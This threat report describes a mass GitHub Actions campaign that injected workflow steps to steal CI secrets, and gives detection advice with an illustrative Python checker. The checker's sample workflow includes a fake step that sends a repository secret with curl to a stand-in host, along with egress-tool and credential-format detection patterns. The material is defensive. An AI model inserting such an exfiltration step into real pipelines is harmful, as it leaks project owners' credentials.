Threats

Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows

Megalodon pushed 5,718 malicious GitHub commits in 6 hours, exposing CI secrets and cloud credentials at scale.


Overview

  • The attackers targeted CI/CD workflow files, injecting malicious steps into GitHub Actions pipelines to exfiltrate repository secrets.
  • Affected repositories spanned the open-source ecosystem, with cloud provider credentials, API tokens, and signing keys exposed in leaked workflow output.
  • The campaign’s high throughput — nearly a thousand commits per hour — suggests automated tooling scanning for repos with writable workflows and committing en masse before defensive take-downs activated.

Defender Takeaways

Monitor for anomalous commit velocity: Five thousand commits across thousands of repos in six hours means most of these looked identical. Alert on mass-push events where a single actor commits to multiple unrelated repos within a short window. GitHub’s audit log (repo.access, git.push) combined with actor identity clustering is the key detection signal.

Audit workflow file integrity: Track changes to .github/workflows/*.yml and .github/workflows/*.yaml as high-severity events. Attackers add or modify workflow steps to exfiltrate ${{ secrets.* }} values. Deploy CODEOWNERS or branch protection on the workflows directory so unapproved workflow changes require review.

Scan for secret exposure in Action output: CI/CD secrets are dumped to runner logs and exfiltrated via HTTP requests embedded in workflow steps. Use GitHub secret scanning, third-party secret scanners, and centralize CI log retention with SIEM ingestion to detect outbound secret leakage.
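The two takeaways above (workflow integrity and secret exposure in Action output) share one added example below; it is illustrative code, not the report's or GitHub's own tooling. It triages a workflow change by splitting the before/after YAML into steps with a deliberately simple indentation heuristic (an assumption that avoids a YAML dependency and will miss exotic layouts) and flags added or modified steps that both reference `${{ secrets.* }}` and contain a network-egress command, then scans constructed runner-log lines for well-known credential formats. The workflow contents, the `collector.invalid` host and the token strings are constructed samples; the AWS key id is the documented `AKIAIOSFODNN7EXAMPLE` placeholder.

```python
import re

# Constructed "before" and "after" contents of a hypothetical
# .github/workflows/ci.yml; the "after" version gained one extra step.
OLD_WORKFLOW = """\
name: ci
on: [push]
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run tests
        run: make test
"""

NEW_WORKFLOW = OLD_WORKFLOW + """\
      - name: Upload coverage
        env:
          TOKEN: ${{ secrets.DEPLOY_TOKEN }}
        run: curl -s -H "Authorization: Bearer $TOKEN" https://collector.invalid/upload
"""

# A step that touches repository secrets AND reaches the network deserves review.
SECRET_REF = re.compile(r"\$\{\{\s*secrets\.[A-Za-z0-9_]+\s*\}\}")
EGRESS = re.compile(r"\b(curl|wget|nc|ncat|Invoke-WebRequest|Invoke-RestMethod)\b|https?://")

# Credential formats worth alerting on when they show up in CI log output.
LOG_SECRET_PATTERNS = {
    "aws_access_key_id": re.compile(r"\bAKIA[0-9A-Z]{16}\b"),
    "github_pat": re.compile(r"\bghp_[A-Za-z0-9]{36}\b"),
    "private_key_block": re.compile(r"-----BEGIN [A-Z ]*PRIVATE KEY-----"),
}


def split_steps(workflow_text):
    """Split a workflow into step texts using indentation (heuristic, not a YAML parser).

    A step starts at a '- ' item directly under a 'steps:' key; following lines
    with deeper indentation belong to that step.
    """
    steps, current, step_indent, in_steps = [], [], None, False
    for line in workflow_text.splitlines():
        stripped = line.lstrip()
        indent = len(line) - len(stripped)
        if stripped.startswith("steps:"):
            if current:
                steps.append("\n".join(current))
            current, step_indent, in_steps = [], None, True
            continue
        if not in_steps or not stripped:
            continue
        if stripped.startswith("- ") and (step_indent is None or indent == step_indent):
            step_indent = indent
            if current:
                steps.append("\n".join(current))
            current = [line]
        elif step_indent is not None and indent <= step_indent:
            # Dedented back out of the steps list: close the current step.
            if current:
                steps.append("\n".join(current))
            current, in_steps = [], False
        elif current:
            current.append(line)
    if current:
        steps.append("\n".join(current))
    return steps


def suspicious_steps(old_text, new_text):
    """Return added or modified steps that reference secrets and have egress."""
    old_steps = set(split_steps(old_text))
    findings = []
    for step in split_steps(new_text):
        if step in old_steps:
            continue  # unchanged step; not part of this change
        if SECRET_REF.search(step) and EGRESS.search(step):
            match = re.search(r"name:\s*(.+)", step)
            name = match.group(1).strip() if match else step.splitlines()[0].strip()
            findings.append({"name": name, "secrets": SECRET_REF.findall(step)})
    return findings


def scan_runner_log(lines):
    """Return (line_number, pattern_name) for every credential-shaped token."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for kind, pattern in LOG_SECRET_PATTERNS.items():
            if pattern.search(line):
                hits.append((number, kind))
    return hits


# Constructed runner-log excerpt; values are placeholders, not real credentials.
SAMPLE_RUNNER_LOG = [
    "Run make test",
    "AWS_ACCESS_KEY_ID=AKIAIOSFODNN7EXAMPLE",
    "GH_TOKEN=ghp_0123456789abcdef0123456789abcdef0123",
    "-----BEGIN RSA PRIVATE KEY-----",
    "All 42 tests passed",
]

if __name__ == "__main__":
    print(suspicious_steps(OLD_WORKFLOW, NEW_WORKFLOW))
    print(scan_runner_log(SAMPLE_RUNNER_LOG))
```

A legitimate deploy step will also trip `suspicious_steps`, which is the point: the output is a review queue for the CODEOWNERS approver, not a verdict. GitHub normally masks registered secret values in job logs, so `scan_runner_log` is most useful against logs centralised in a SIEM, where it catches credentials that were never registered as secrets or that were emitted in a form the masking did not cover.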

Rotate credentials on breach signal: The initial signal of a workflow compromise should trigger automatic credential rotation for all secrets exposed to the affected repository. Manual rotation windows are measured in minutes — attackers execute the exfiltration step in the same job that runs the malicious commit.

Sources